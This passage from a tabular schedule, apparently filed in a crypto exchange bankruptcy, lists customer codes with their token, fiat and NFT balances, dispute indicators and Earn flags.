| 07379114 | | DOGE[174.10616506], USD[0.00] | | |
| 07379115 | | BAT[.00000918], CUSDT[1.00417254], SHIB[440069.4733214], USD[0.37], USDT[0] | Yes | |
| 07379116 | | USD[10.00] | | |
| 07379117 | | DOGE[.87888232], USD[1.72] | | |
| 07379118 | | USD[10.00] | | |
| 07379119 | | BAT[1], BTC[.00953768], DOGE[17453.55404117], ETH[.20758095], ETHW[.20758095], TRX[1], USD[200.00], USDT[2] | | |
| 07379120 | | CUSDT[1], DOGE[34.22091707], ETH[0], ETHW[0.02846024], SHIB[2], TRX[1], USD[51.96] | | |
| 07379121 | | KSHIB[84.52953751], NFT (41839955274128226t/Travel sprouts collection #170)[1], NFT (428762442160625598/Travel sprouts collection #80)[1], USD[0.00] | | |
| 07379122 | | USD[0.00] | | |
| 07379123 | | USD[0.00] | | |
| 07379124 | | USD[0.00] | | |
| 07379125 | | USD[10.00] | | |
| 07379126 | | USD[10.00] | | |
| 07379127 | | TRX[220.58027169], USD[0.00] | | |
| 07379128 | | USD[10.00] | | |
| 07379129 | | CUSDT[1], TRX[567.95521597], USD[0.00], USDT[0] | Yes | |
| 07379130 | | CUSDT[.00003464], DOGE[41.997248], TRX[60.15485338], USD[3.47] | | |
| 07379131 | | CUSDT[3], DOGE[2247.32889124], TRX[2], USD[0.00] | Yes | |
| 07379132 | | CUSDT[1], DOGE[1], USD[0.05] | | |
| 07379133 | | CUSDT[2], DOGE[21.75418833], TRX[2], USD[0.43] | | |
| 07379134 | | BTC[.00051433], DOGE[489.89941841], LTC[.06377722], TRX[354.50456545], USD[0.00] | Yes | |
| 07379135 | | USD[10.00] | | |
| 07379136 | | DOGE[727.74830569], USD[10.00] | | |
| 07379137 | | DOGE[1], USD[108.29] | Yes | |
| 07379138 | | BRZ[2.04559786], CUSDT[65.43924327], DOGE[0], LTC[0], TRX[.0032592], USD[0.00] | Yes | |
| 07379139 | | BTC[.00000035], DOGE[0], USD[0.00] | | |
| 07379140 | | BAT[1], TRX[4], USD[0.00], USDT[10] | | |
| 07379141 | | DOGE[1155.01055897], USD[0.00], USDT[1] | | |
| 07379142 | | CUSDT[17], LINK[.00028751], USD[12.87] | Yes | |
| 07379143 | | USD[10.00] | | |
| 07379144 | | BAT[1.01263238], CUSDT[1], SOL[0], TRX[3], USD[0.00] | Yes | |
| 07379145 | | USD[10.00] | | |
| 07379146 | | CUSDT[1], DOGE[72.36862959], SUSHI[3.53208511], TRX[67.2252785], USD[0.00] | | |
| 07379147 | | USD[10.00] | | |
| 07379148 | | USD[10.00] | | |
| 07379149 | | CUSDT[7], DOGE[1], USD[0.05] | | |
| 07379150 | | CUSDT[1], USD[74.70] | | |
| 07379151 | | USD[123.82] | | |
| 07379152 | | USD[10.00] | | |
| 07379154 | | CUSDT[3], DOGE[13635.95111704], TRX[1], USD[10.00] | | |
| 07379155 | | CUSDT[1], DOGE[1347.17488665], USD[10.89] | Yes | |
| 07379156 | | SHIB[1515.3668217], USD[0.00], USDT[0] | Yes | |
| 07379157 | | NFT (542065891655014262t/Humpty Dumpty #1399)[1] | | |
| 07379158 | Contingent, Disputed | USD[0.00] | | |
| 07379161 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07379162 | | ETH[.00000001], SHIB[0], SOL[0], SUSHI[0], USD[0.00], USDT[0.00000073] | Yes | |
| 07379163 | | DOGE[8.00666278], USD[0.00] | | |
| 07379165 | | BCH[1.04468264], BF_POINT[200], BRZ[5], CUSDT[21], DOGE[1], KSHIB[1860.24455253], LINK[8.72860458], NFT (336987963018782921/Michael Gerard Tyson #2 Of 5 )[1], NFT (448858879936927293/Kwai )[1], NFT (497232953606492257/Super cars )[1], NFT (554442145226901437/Fight night mgm )[1], NFT (557201791936684998/Commodities #1 of 5)[1], SHIB[5007038.99533904], TRX[2], USD[431.21], USDT[3] | | |
| 07379166 | | DOGE[31.42612477], USD[0.00] | | |
| 07379168 | | ETH[2.28261625], ETHW[2.28165757], LTC[6.08049404], SOL[54.89435607], USD[0.00], USDT[0] | Yes | |
| 07379169 | | USD[10.00] | | |
| 07379170 | | USD[10.00] | | |
| 07379171 | | USD[10.00] | | |
| 07379172 | | BRZ[2.06608813], CUSDT[3], DOGE[66.84764932], SUSHI[1.19368051], USD[5.36] | Yes | |
| 07379173 | | CUSDT[2], DOGE[103.76731814], SUSHI[2.24892548], USD[15.00] | | |
| 07379174 | | USD[10.00] | | |
| 07379175 | | USD[10.00] | | |
| 07379176 | | BAT[24.34486151], CUSDT[9], DOGE[4589.24805801], GRT[139.75104885], LINK[.35499472], MATIC[24.44255299], SHIB[2], SUSHI[.40786939], TRX[2059.17574679], USD[0.00], USDT[19.88019972] | | |
| 07379177 | | CUSDT[1], DOGE[706.86920419], TRX[2], USD[0.01] | | |
| 07379178 | | CUSDT[1], DOGE[129.68649257], USD[0.00] | Yes | |
| 07379179 | | CUSDT[1], DOGE[49.66590438], USD[0.20] | | |
| 07379180 | | USD[10.00] | | |
| 07379181 | | BRZ[2], CUSDT[22], TRX[5], USD[0.00] | | |
| 07379182 | | USD[10.00] | | |
| 07379183 | | USD[10.00] | | |
| 07379184 | | USD[10.00] | | |
| 07379185 | | USD[10.00] | | |
| 07379186 | | DOGE[28.25378532], USD[0.00] | | |
| 07379187 | | DOGE[137.75353193], USD[0.00] | | |
| 07379188 | | BTC[.01333484], CUSDT[2], ETH[.11727416], ETHW[.11613913], USD[132.86], USDT[1.09053269] | Yes | |
| 07379189 | | USD[0.00] | | |
| 07379190 | | GRT[5.84659489], USD[0.00] | | |
| 07379191 | | USD[10.00] | | |
| 07379192 | | CUSDT[2], DOGE[.00008477], GRT[.7166443], USD[19.42] | | |
| 07379193 | | DOGE[0], USD[0.20] | | |
| 07379194 | | CUSDT[1], SOL[.48919375], USD[0.00] | | |
| 07379195 | | DOGE[141.78082386], USD[0.00] | | |
| 07379196 | | BAT[2.12268357], BRZ[3], CUSDT[4], TRX[6], USD[0.00] | Yes | |
| 07379197 | | DOGE[140.29855813], USD[0.00] | | |
| 07379198 | | CUSDT[3], TRX[1], USD[10.11] | | |
| 07379199 | | USD[0.00] | | |
| 07379200 | | BTC[.00005275], SOL[40.36162], USDT[.10865514] | | |
| 07379201 | | USD[10.00] | | |
| 07379202 | | USD[11.02] | Yes | |
| 07379203 | | DOGE[138.51537832], USD[0.00] | | |
| 07379204 | | BTC[.00000602], DOGE[63.7696118], ETH[.00009117], ETHW[.00009117], KSHIB[3.43597129], SHIB[6872.85223367], TRX[35.9801235], USD[0.00] | Yes | |
| 07379205 | | AUD[0.00], BRZ[0], BTC[0], CUSDT[0], DOGE[18.67038142], ETH[0], LTC[0], SUSHI[0], USD[0.00], USDT[0] | | |
| 07379206 | | BTC[.00106353], CUSDT[3], USD[0.00] | Yes | |
| 07379207 | | USD[10.00] | | |
| 07379208 | | GRT[4.16714769], USD[0.00] | | |
| 07379209 | | USD[10.00] | | |
| 07379210 | | USD[10.00] | | |
| 07379211 | | USD[10.00] | | |
| 07379212 | | USD[10.00] | | |
| 07379214 | | BRZ[1], BTC[0.00485549], CUSDT[139.07388528], DOGE[1], ETH[.01324121], ETHW[.01324121], SHIB[329656.21691115], TRX[1], USD[0.00] | | |
| 07379215 | | USD[0.00] | Yes | |
| 07379216 | | BTC[0], CUSDT[1], DOGE[0], USD[0.00] | | |
| 07379217 | | USD[10.00] | | |
| 07379218 | | DOGE[1], USD[15.38] | | |
| 07379220 | | BTC[.00010453], USD[5.00] | | |
| 07379221 | | BTC[.00021174], USD[0.00] | | |
| 07379222 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07379223 | | BTC[0], NFT (29779308887998315/Angomon #2608)[1], NFT (33601225540005Z305/Solana Penguin #2317)[1], NFT (36081893870920Z0957/HIDE N' GHOSEEK)[1], NFT (37317136223575990/Solana Penguin #6308)[1], NFT (43619271920804681S/Nois3)[1], NFT (44245224383645096/LonelyGhose© N°1624)[1], NFT (46183219188218406/sheep_443)[1], NFT (4886395098813613993/Angomon #2986)[1], NFT (49853515363218835/Whales Nation #4221)[1], NFT (49855091541283163/Angomon #368)[1], NFT (50445903355942278/Angomon #398)[1], NFT (53510426784811895Z/Angomon #1123)[1], NFT (5351235594138314505/Solana Penguin #4086)[1], NFT (53549049723980214S/Nois3)[1], NFT (53681908726117407Z/Solana Penguin #4705)[1], USD[0.00] | | |
| 07379224 | | USD[10.00] | | |
| 07379225 | | DOGE[4.87845401], TRX[2], USD[1.27] | | |
| 07379226 | | DOGE[13.5843467], USD[0.00], USDT[8.94009986] | | |
| 07379228 | | USD[0.00] | | |
| 07379229 | | BTC[0], CUSDT[3], DOGE[424.68149133], TRX[.00003769], USD[0.00] | Yes | |
| 07379230 | | CUSDT[1], USD[8.80] | | |
| 07379231 | | BAT[.55975962], BRZ[2], CUSDT[15], DOGE[0.00002364], GRT[1.00498957], TRX[5], USD[0.00] | Yes | |
| 07379232 | | BTC[0], DOGE[43.44747855], ETH[0], ETHW[0], USD[0.00] | Yes | |
| 07379233 | | DOGE[122.40575282], USD[0.00] | | |
| 07379234 | | BTC[.0008833], TRX[1], USD[0.00] | Yes | |
| 07379235 | | BAT[2], CUSDT[2], DOGE[.1483527], USD[0.01] | | |
| 07379236 | | BTC[0], CUSDT[1], DOGE[291.75333098], TRX[1], USD[0.13] | | |
| 07379238 | | BAT[1], GRT[1], USD[0.00], USDT[0.00000001] | Yes | |
| 07379239 | | DOGE[13.11158259] | | |
| 07379240 | | BRZ[1], CUSDT[5], DOGE[1], GRT[1], TRX[2], USD[0.00] | | |
| 07379242 | | USD[10.00] | | |
| 07379243 | | USD[10.00] | | |
| 07379244 | | DOGE[144.6324503], USD[0.00] | | |
| 07379245 | | USD[10.00] | | |
| 07379246 | | USD[10.00] | | |
| 07379247 | | USD[10.00] | | |
| 07379248 | | DOGE[20.5410188], USD[0.00] | | |
| 07379250 | | USD[10.00] | | |
| 07379251 | | USD[10.00] | | |
| 07379252 | | CUSDT[1], DOGE[.00785934], USD[137.34] | | |
| 07379253 | | BCH[.00008615], BTC[0], DOGE[.09479801], USD[0.00] | | |
| 07379254 | | BRZ[1], BTC[0], CUSDT[1], TRX[1], USD[0.00] | | |
| 07379255 | | CUSDT[2], USD[0.01] | | |
| 07379257 | | DOGE[2], SHIB[1], TRX[1.00614016], USD[0.00] | | |
| 07379258 | | USD[10.00] | | |
| 07379259 | | CUSDT[3], DOGE[618.59968503], SUSHI[3.31628812], USD[254.17] | | |
| 07379260 | | USD[10.00] | | |
| 07379261 | | BCH[0], BTC[0], CUSDT[0], DOGE[21.92626041], ETH[0], ETHW[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.03] | | |
| 07379262 | | USD[10.00] | | |
| 07379263 | | DOGE[1], ETH[0.13532913], ETHW[0.13426440], TRX[1], USD[0.00] | Yes | |
| 07379265 | | CUSDT[2], DOGE[258.24786194], USD[126.35] | Yes | |
| 07379266 | | DOGE[.00004168], TRX[1], USD[0.00], USDT[0] | | |
| 07379268 | | BTC[.00021423], USD[0.00] | | |
| 07379269 | | USD[10.00] | | |
| 07379270 | | BAT[0], BRZ[5], CUSDT[6], DOGE[1], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07379271 | | AUD[1.34], BTC[.00003232], SHIB[118891.01588295], USD[0.04] | Yes | |
| 07379272 | | USD[10.00] | | |
| 07379273 | | BAT[1], BRZ[1], CUSDT[3], USD[0.00] | | |
| 07379274 | | USD[10.00] | | |
| 07379275 | | USD[0.00] | | |
| 07379276 | | DOGE[122.87699275], USD[0.00] | | |
| 07379278 | | BRZ[1], CUSDT[4], USD[0.01] | | |
| 07379279 | | DOGE[136.46841308], TRX[1], USD[0.00] | | |
| 07379280 | | CUSDT[1], DOGE[.0000387], USD[0.00] | | |
| 07379281 | | CUSDT[2], TRX[3], USD[0.01] | | |
| 07379282 | | BTC[.00017131], USD[0.00] | | |
| 07379283 | | CUSDT[1], DOGE[1038.9594126], ETH[.01243669], ETHW[.01243669], TRX[1], USD[0.00] | | |
| 07379284 | | CUSDT[3], DOGE[131.81837384], ETH[.00235854], ETHW[.00233118], USD[0.00] | Yes | |
| 07379285 | | SHIB[2], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07379286 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07379287 | | USD[10.00] | | |
| 07379288 | | BRZ[.00002188], CUSDT[2], DOGE[0], SHIB[1], USD[0.23] | Yes | |
| 07379289 | | USD[10.00] | | |
| 07379290 | | USD[10.00] | | |
| 07379291 | | CAD[6.27], DAI[.99173127], USD[0.00], USDT[3.9768345] | | |
| 07379292 | | CUSDT[0], DOGE[0], ETH[0], TRX[1267.15713786], USD[0.01] | Yes | |
| 07379293 | | DOGE[195.69437157], USD[0.00] | | |
| 07379294 | | DOGE[.92], TRX[.000012], USD[0.01] | | |
| 07379295 | | USD[10.00] | | |
| 07379296 | | DOGE[139.26284832], USD[0.00] | | |
| 07379297 | | USD[10.00] | | |
| 07379298 | | USD[10.00] | | |
| 07379299 | | USD[10.00] | | |
| 07379300 | | USD[10.00] | | |
| 07379301 | | AVAX[1.1397228], BRZ[3], CUSDT[38], DOGE[1911.12033963], MATIC[19.5498665], SHIB[1716265.90995861], SOL[5.63707776], TRX[85.82458566], USD[40.59], USDT[1.05110769] | Yes | |
| 07379302 | Contingent, Disputed | BAT[0], BCH[0], BTC[0], CUSDT[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | | |
| 07379303 | | BRZ[1], CUSDT[2], TRX[2], USD[0.00], USDT[0] | | |
| 07379304 | | TRX[197.07279967], USD[0.00] | | |
| 07379306 | | CUSDT[1], DOGE[1431.2699486], SHIB[1469075.95122667], USD[0.00] | | |
| 07379307 | | USD[10.00] | | |
| 07379308 | | DOGE[1], USD[0.01] | | |
| 07379309 | | USD[10.00] | | |
| 07379310 | | CUSDT[1154.08810817], DOGE[452.78029624], GRT[16.15349866], NFT (47260679379028483/2974 Floyd Norman - CLE 4-0184)[1], SOL[19.80949802], SUSHI[1.16332877], TRX[306.72731496], UNI[3.47364398], USD[0.08] | Yes | |
| 07379311 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07379312 | | CUSDT[7], TRX[2], USD[11.56] | Yes | |
| 07379313 | | BCH[.18704663], BTC[.02156234], CUSDT[3], DOGE[994.91687754], TRX[663.3983374], USD[300.01], USDT[0] | | |
| 07379314 | | BRZ[2], CUSDT[3], DOGE[2], TRX[2], USD[0.00], USDT[0] | | |
| 07379315 | | USD[0.00] | | |
| 07379317 | | BTC[.00017468], USD[0.00] | Yes | |
| 07379319 | | CUSDT[3], USD[0.01] | Yes | |
| 07379320 | | BAT[1.0165555], BRZ[1], CUSDT[589.58680991], ETH[.0116619], ETHW[.01151142], SHIB[1081961.37171449], TRX[368.0105731], USD[0.00], USDT[0] | Yes | |
| 07379321 | | CUSDT[1], DOGE[267.06249375], USD[0.00] | Yes | |
| 07379323 | | BTC[.00646004], CUSDT[1], DOGE[2938.90053108], ETH[.10915372], ETHW[.10915372], LINK[6.61146948], SUSHI[11.9038075], TRX[3655.03387983], USD[10.00] | | |
| 07379324 | | DOGE[135.438976], USD[0.00] | | |
| 07379325 | | USD[0.22] | | |
| 07379327 | | USD[10.00] | | |
| 07379328 | | CUSDT[1], ETH[.01229682], ETHW[.01229682], TRX[2], USD[0.00] | | |
| 07379329 | | BRZ[2], CUSDT[70.85174035], GRT[1], SOL[10.19631885], TRX[2], USD[0.00], USDT[1] | | |
| 07379330 | | DOGE[1544.64985664], USD[0.00] | | |
| 07379331 | | USD[10.00] | | |
| 07379333 | | BTC[.00000043], ETH[0], LINK[0], LTC[0], SHIB[1], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07379334 | | ETHW[1.80937315], LINK[150.83996992], USD[81.54] | | |
| 07379335 | | BRZ[1], CUSDT[5], DOGE[113.70746923], GRT[1], MATIC[7.64749396], SHIB[1], USD[4.13] | | |
| 07379336 | | USD[10.00] | | |
| 07379337 | | USD[10.00] | | |
| 07379338 | | USD[10.00] | | |
| 07379339 | | USD[10.00] | | |
| 07379340 | | USD[10.00] | | |
| 07379341 | | BRZ[1], BTC[.00407163], DOGE[5627.70369418], GRT[1], LTC[0], TRX[2], USD[0.00] | | |
| 07379342 | | USD[10.00] | | |
| 07379343 | | BTC[.0001734], USD[0.00] | | |
| 07379345 | | BTC[.00025486], USD[0.00] | | |
| 07379347 | | BTC[0], DOGE[0], TRX[0], USD[4994.00], USDT[0] | | |
| 07379348 | | DOGE[137.74385483], USD[10.00] | | |
| 07379349 | | BAT[1], TRX[1], USD[0.01], USDT[0.00000001] | | |
| 07379350 | | DOGE[0], ETH[0], USD[0.00], USDT[0] | Yes | |
| 07379351 | | BTC[0], DOGE[4.35520897], USD[0.22] | | |
| 07379352 | | DOGE[4386.16806611], SHIB[1], TRX[1], USD[11.10] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07379353 | | BTC[.00134061], CUSDT[1], DOGE[25.23989064], USD[0.01] | | |
| 07379354 | | BRZ[4], CUSDT[4], DOGE[2], ETH[1.04788684], ETHW[1.04744662], GRT[178.8916793], NFT (448434533765666481/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #91][1], SHIB[1], SOL[5.80297279], SUSHI[23.36231964], TRX[6], USD[0.01], USDT[3.3162076] | Yes | |
| 07379355 | | USD[10.00] | | |
| 07379356 | | DOGE[41.73146261], TRX[1], USD[1.11] | Yes | |
| 07379357 | | BTC[.00014394], DOGE[1.06059511], USD[0.00] | | |
| 07379358 | | DOGE[1422.10431707], ETH[.12415974], ETHW[.12299642], TRX[185.7942615], USD[0.00] | Yes | |
| 07379359 | | USD[0.01] | | |
| 07379360 | | BRZ[1], CUSDT[2], DOGE[.36161245], USD[0.78] | | |
| 07379361 | | USD[10.00] | | |
| 07379362 | | TRX[18.86464625], USD[0.00] | | |
| 07379363 | | BTC[.00017817], USD[0.00] | | |
| 07379364 | | DOGE[18.17633222], USD[0.00] | | |
| 07379365 | | BRZ[2], DOGE[6846.13391067], LINK[39.80727718], TRX[68.1323993], USD[0.00] | | |
| 07379366 | | USD[10.00] | | |
| 07379367 | | USD[10.00] | | |
| 07379368 | | USD[10.00] | | |
| 07379369 | | BRZ[3], CUSDT[8], TRX[3], USD[0.00], USDT[1] | | |
| 07379370 | | BAT[1.0165555], BRZ[3], CUSDT[9], DOGE[4], GRT[1.00367791], LINK[0], TRX[6], USD[0.01], USDT[0.00007380] | Yes | |
| 07379371 | | CUSDT[2], DOGE[1], LINK[2.07903233], SOL[.5751697], USD[0.00] | | |
| 07379372 | | DOGE[.44657120], LINK[0], UNI[0], USD[0.00] | | |
| 07379373 | | USD[10.00] | | |
| 07379374 | | USD[10.00] | | |
| 07379375 | | DOGE[1], USD[0.00] | | |
| 07379377 | | USD[10.00] | | |
| 07379378 | | USD[10.00] | | |
| 07379379 | | USD[10.00] | | |
| 07379380 | | CUSDT[1], USD[0.01] | | |
| 07379381 | | USD[10.00] | | |
| 07379382 | | USD[0.00] | | |
| 07379383 | | USD[11.08] | Yes | |
| 07379384 | | CUSDT[5], TRX[1], USD[0.60], USDT[0] | Yes | |
| 07379385 | | DOGE[0], SOL[0] | | |
| 07379386 | | BTC[.00017888], USD[0.00] | | |
| 07379387 | | BTC[0.00007558], DOGE[.35365], ETH[.0006168], ETHW[.0006168], LINK[.04855], SOL[.089445], SUSHI[.14945], USD[2.32] | | |
| 07379388 | | DOGE[0], LTC[0], SOL[0], TRX[0] | | |
| 07379389 | | BRZ[2], CUSDT[4], TRX[2], USD[0.00] | Yes | |
| 07379390 | | CUSDT[3041.89090078], DOGE[655.08027287], TRX[327.32814127], USD[0.00] | Yes | |
| 07379391 | | CUSDT[1], DOGE[8292.57782018], TRX[669.22742318], USD[0.00] | | |
| 07379392 | | CUSDT[1], DOGE[.00002315], USD[0.01] | | |
| 07379393 | | BTC[.00450688], DOGE[2], USD[10.00] | | |
| 07379395 | | BRZ[1], USD[0.00] | | |
| 07379397 | | DOGE[281.86372899], USD[0.00] | | |
| 07379398 | | USD[10.00] | | |
| 07379400 | | BRZ[1], BTC[0], CUSDT[3], DOGE[1], TRX[2], USD[0.01] | | |
| 07379401 | | USD[10.00] | | |
| 07379402 | | BTC[.00020487], CUSDT[1], USD[0.00] | | |
| 07379403 | | BRZ[1], DOGE[1], USD[0.29] | | |
| 07379404 | | DOGE[26.0741983], USD[0.00] | | |
| 07379405 | | DOGE[2.14662873], USD[0.33] | | |
| 07379406 | | BRZ[1], CUSDT[6.93777227], TRX[3], USD[0.28], USDT[1] | | |
| 07379407 | | USD[0.00] | | |
| 07379409 | | USD[0.00] | | |
| 07379411 | | USD[0.00] | Yes | |
| 07379412 | | USD[10.00] | | |
| 07379413 | | BTC[.0004981], DOGE[310.8144], ETH[.0139468], ETHW[.0139468], SHIB[300000], USD[6.25] | | |
| 07379414 | | CUSDT[1], DOGE[42.59557], TRX[86.9142458], USD[0.00] | | |
| 07379415 | | BRZ[3], BTC[.00043625], CUSDT[25], DOGE[9.04248644], ETH[.00000008], ETHW[.00000008], GRT[73.04538185], KSHIB[234.29014191], LTC[.2772326], NFT (479629182308085444/Entrance Voucher #3711][1], SHIB[988582.94157152], SUSHI[3.03081084], TRX[765.71822397], USD[0.00], YFI[.00105157] | | |
| 07379416 | | CUSDT[1], TRX[2], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07379417 | | CUSDT[262.53478278], DOGE[3.20711052], SHIB[3], TRX[2], USD[0.73] | Yes | |
| 07379418 | | USD[10.00] | | |
| 07379419 | | USD[10.00] | | |
| 07379420 | | CUSDT[2], MATIC[23.73172244], SHIB[42064.06070243], USD[0.00] | Yes | |
| 07379422 | | BAT[1.01655549], BRZ[3], CUSDT[5], DOGE[2], GRT[3.13973116], TRX[8.00087675], USD[0.00], USDT[0] | Yes | |
| 07379423 | | CUSDT[5], DOGE[122.14686436], ETH[0], USD[0.00] | | |
| 07379424 | | CUSDT[322.87412867], DOGE[23.15175258], USD[20.51] | | |
| 07379425 | | CUSDT[1], USD[11.03] | Yes | |
| 07379426 | | USD[10.00] | | |
| 07379427 | | USD[10.00] | | |
| 07379428 | | USD[10.00] | | |
| 07379430 | | USD[10.00] | | |
| 07379431 | | CUSDT[1], USD[0.00] | Yes | |
| 07379432 | | BCH[0], BTC[0], CAD[0.00], CUSDT[1], DAI[0], GRT[1], USD[0.00], USDT[0] | | |
| 07379433 | | SHIB[0], USD[0.00], USDT[0] | Yes | |
| 07379435 | | BAT[1], DOGE[1], SHIB[4], SOL[0], USD[0.00] | Yes | |
| 07379438 | | DOGE[0], MATIC[.20522788], USD[0.00], USDT[0] | Yes | |
| 07379439 | | DOGE[0], GRT[0], LINK[0], LTC[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07379440 | | BRZ[1], CUSDT[3], DOGE[0], USD[0.01] | | |
| 07379441 | | BAT[29.08464777], CUSDT[2], DAI[0], DOGE[50.45192151], GRT[0], LINK[0], LTC[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | | |
| 07379442 | | USD[10.00] | | |
| 07379443 | | BRZ[48.71348879], CUSDT[19], DOGE[105.95463701], ETH[.0062972], ETHW[.00621512], KSHIB[120.60360657], SOL[.23712236], TRX[108.00413604], USD[1.26] | Yes | |
| 07379444 | | USD[10.00] | | |
| 07379445 | | DOGE[1387.76598129], TRX[221.80089909], USD[0.00] | | |
| 07379446 | | BRZ[3], CUSDT[7], GRT[2], TRX[10], USD[0.01], USDT[0] | | |
| 07379447 | | USD[10.00] | | |
| 07379448 | | DOGE[16203.32], LTC[8.37636], TRX[6941.124], USD[94.19] | | |
| 07379449 | | USD[10.00] | | |
| 07379450 | | BAT[1], BRZ[1], CUSDT[1], DOGE[1], SHIB[6545359.34022777], TRX[1], USD[0.00] | | |
| 07379451 | | TRX[1], USD[0.01] | | |
| 07379452 | | USD[10.00] | | |
| 07379453 | | USD[10.00] | | |
| 07379454 | | BTC[.00005142], DOGE[.99997133], ETH[.00065374], ETHW[.00065374], LTC[.0203395], TRX[1], USD[0.00], USDT[0] | | |
| 07379455 | | CUSDT[2], DOGE[.00520882], USD[0.01] | Yes | |
| 07379456 | | CUSDT[1], DOGE[0], USD[0.00] | | |
| 07379457 | | USD[10.00] | | |
| 07379458 | | BRZ[1], CUSDT[1], DOGE[1], USD[0.08] | | |
| 07379459 | | USD[10.00] | | |
| 07379460 | | USD[10.00] | | |
| 07379462 | | ALGO[0], BAT[0], BCH[0], BRZ[0], BTC[0], CUSDT[0], DAI[0.05942795], DOGE[0], ETH[0], ETHW[0], GBP[0.00], LINK[0], LTC[0], MATIC[0], NEAR[0], NFT [568393264041817327/Imola Ticket Stub #8551](1], PAXG[0], SHIB[0], SOL[0], TRX[0], UNI[0], USD[0.00], USDT[0], WBTC[0] | | |
| 07379463 | | CUSDT[1], DOGE[143.94814642], USD[0.00] | | |
| 07379464 | | USD[0.02] | | |
| 07379465 | | USD[10.00] | | |
| 07379466 | | CUSDT[1], DOGE[347.71764792], ETH[.00024514], ETHW[.00024514], SHIB[446076.85557181], USD[0.00] | | |
| 07379467 | | CUSDT[1], DOGE[613.25302750], ETH[.00540585], ETHW[.00533745], SHIB[1629031.18412122], TRX[1], USD[0.00] | Yes | |
| 07379468 | | USD[10.00] | | |
| 07379470 | | USD[10.00] | | |
| 07379471 | | USD[10.00] | | |
| 07379472 | | BTC[.00003972], CUSDT[2], DOGE[54.32021161], TRX[2], USD[0.00] | | |
| 07379473 | | BCH[0], CUSDT[2], DOGE[0.00499154], TRX[0], USD[0.00] | | |
| 07379474 | | USD[10.00] | | |
| 07379475 | | TRX[.59635543], USD[0.00] | | |
| 07379476 | | USD[10.00] | | |
| 07379477 | | USD[10.00] | | |
| 07379478 | | CUSDT[1], DOGE[1206.16204063], USD[10.00] | | |
| 07379479 | | BAT[.00089282], BCH[.02031717], BRZ[1], BTC[0.05994398], CUSDT[1], DOGE[405.64241115], ETH[.15814758], ETHW[.15814758], GRT[4.47728549], LINK[4.25105475], LTC[.06959793], MATIC[21.38201801], SHIB[1356048.80581516], SOL[5.55311591], SUSHI[3.49715714], UNI[.48024176], USD[0.01] | | |
| 07379480 | | USD[0.01] | | |
| 07379481 | | DOGE[2921.54402234], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07379483 | | BRZ[4], CUSDT[10], DOGE[952.94544728], GRT[1.00498957], TRX[5], USD[0.00] | Yes | |
| 07379484 | | BRZ[1], CUSDT[1], DOGE[1], USD[0.01] | Yes | |
| 07379485 | | BTC[0], DOGE[0], ETH[0], USD[0.00] | | |
| 07379486 | | CUSDT[1], USD[0.03] | | |
| 07379488 | | USD[10.00] | | |
| 07379490 | | CUSDT[3], DOGE[37.2243608], ETH[.00559953], ETHW[.00559953], TRX[328.6618681], USD[0.00] | | |
| 07379491 | | CUSDT[1], DOGE[210.61169961], USD[0.00] | Yes | |
| 07379493 | Contingent, Disputed | USD[10.00] | | |
| 07379494 | | USD[10.00] | | |
| 07379495 | | DOGE[1958.80400089], USD[0.00] | Yes | |
| 07379496 | | USD[10.00] | | |
| 07379497 | | BTC[.00021115], CUSDT[2], DOGE[1800.98639458], ETH[.00000363], ETHW[.00000363], GRT[2.03958275], SHIB[771626.56121314], TRX[1], USD[0.00] | Yes | |
| 07379498 | | CUSDT[1], DOGE[212.72997811], SUSHI[3.40841858], USD[0.00] | Yes | |
| 07379499 | | BRZ[1], BTC[.00178739], CUSDT[12], DOGE[1617.64535666], ETH[.01248888], ETHW[.01248888], TRX[4], UNI[1.95579476], USD[0.18] | | |
| 07379500 | | BRZ[1], DOGE[1], SHIB[11341028.07175712], USD[0.00] | | |
| 07379501 | | DOGE[134.73540795], NFT (353589233876470239/Miami Ticket Stub #563)[1], USD[0.00] | | |
| 07379503 | | USD[0.00], USDT[9.94606151] | | |
| 07379504 | | DOGE[2204.87533256], USD[0.00] | | |
| 07379505 | | USD[10.00] | | |
| 07379506 | | BAT[1], BRZ[2], CUSDT[1], DOGE[2], SOL[0], TRX[1], USD[0.01] | | |
| 07379507 | | SHIB[1450234.76618338], USD[0.00] | Yes | |
| 07379508 | | USD[10.06] | | |
| 07379509 | | USD[10.00] | | |
| 07379510 | | DOGE[55.16665335], USD[0.00] | | |
| 07379511 | | USD[10.00] | | |
| 07379512 | | DOGE[178.31726278], USD[0.00] | | |
| 07379513 | | CUSDT[5], TRX[1], USD[0.00] | Yes | |
| 07379514 | | USD[10.00] | | |
| 07379515 | | USD[10.00] | | |
| 07379518 | | USD[10.00] | | |
| 07379519 | | USD[10.00] | | |
